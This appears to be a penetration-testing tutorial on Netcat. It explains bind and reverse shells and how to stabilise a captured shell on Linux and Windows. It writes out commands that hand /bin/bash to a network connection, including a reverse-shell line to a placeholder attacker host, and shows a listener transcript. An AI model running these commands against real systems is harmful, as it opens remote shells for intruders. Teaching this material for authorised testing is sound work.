Netcat

Netcat is a simple Unix utility which reads and writes data across network connections using TCP or UDP protocol. It is designed to be a reliable “back-end” tool that can be used directly or easily driven by other programs and scripts. At the same time it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting built-in capabilities.

Kali’s nc is the “classic” netcat, written by Hobbit. It lacks many features found in netcat-openbsd, and Nmap’s Ncat (whose banners appear in the listener transcript below) is a third implementation again. The listener flags used on this page (-l, -v, -n, -p) behave the same across all three; the -e option, which hands the connection to a program, exists in classic nc and Ncat but not in netcat-openbsd.

Netcat bind shell

In a bind shell the target listens and hands the connection to a shell, and the attacker connects in. Once a listener is waiting on a chosen port of the target (for example one started on the target with nc -lvnp <chosen-port> -e /bin/bash, on a netcat that supports -e), connect to it with:

# nc <target-ip> <chosen-port>

A bind shell needs an inbound connection to the target, so a firewall or NAT in front of the target will often block it; this is why reverse shells are used more often.

Netcat reverse shell

In a reverse shell the roles are swapped: the attacker listens and the target connects back, which gets through most firewalls that allow outbound traffic. Start the listener on the attacking Linux machine (the target then connects to it, for example with nc <attacker-ip> <port-number> -e /bin/bash where -e is available):

# nc -lvnp <port-number>

Stabilising netcat shells

To stabilise a netcat shell on a Linux target:

  • Spawn a better-featured bash shell through a pseudo-terminal with Python’s pty module: python -c 'import pty;pty.spawn("/bin/bash")' (use python3 on targets that have no python binary).

  • Export TERM (export TERM=xterm) so that terminal-aware commands such as clear work.

  • Background the shell with Ctrl+Z. Back in your own terminal, run stty raw -echo; fg to turn off terminal echo (which gives access to tab autocompletion, the arrow keys, and Ctrl+C to kill processes inside the shell instead of killing the listener) and foreground the shell again.

adversary@kali:~# nc -lvnp <port-number>
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::<port-number>
Ncat: Listening on 0.0.0.0:<port-number>
Ncat: Connection from <target IP address>.
Ncat: Connection from <target IP address>:<target port-number>.
python -c 'import pty;pty.spawn("/bin/bash")'
shell@linux:~$ export TERM=xterm
shell@linux:~$ ^Z
[1]+ Stopped        nc -lvnp <port-number>
adversary@kali:~# stty raw -echo; fg
nc -lvnp <port-number>

shell@linux:~$ whoami
shell

If the shell dies, anything you type in your own terminal will not be visible, because terminal echo was disabled with stty raw -echo. To fix this, type reset (you will not see it as you type) and press Enter.

For Windows shells, rlwrap can give access to history, tab autocompletion and the arrow keys immediately when receiving a shell, but some manual stabilisation must still be used to be able to use Ctrl+C inside the shell. rlwrap is not installed by default on Kali, so first install it with sudo apt install rlwrap.

Then use:

adversary@kali:~# rlwrap nc -lvnp <port-number>

The third way to stabilise a shell is to use a netcat shell as a stepping stone into a more fully-featured socat shell.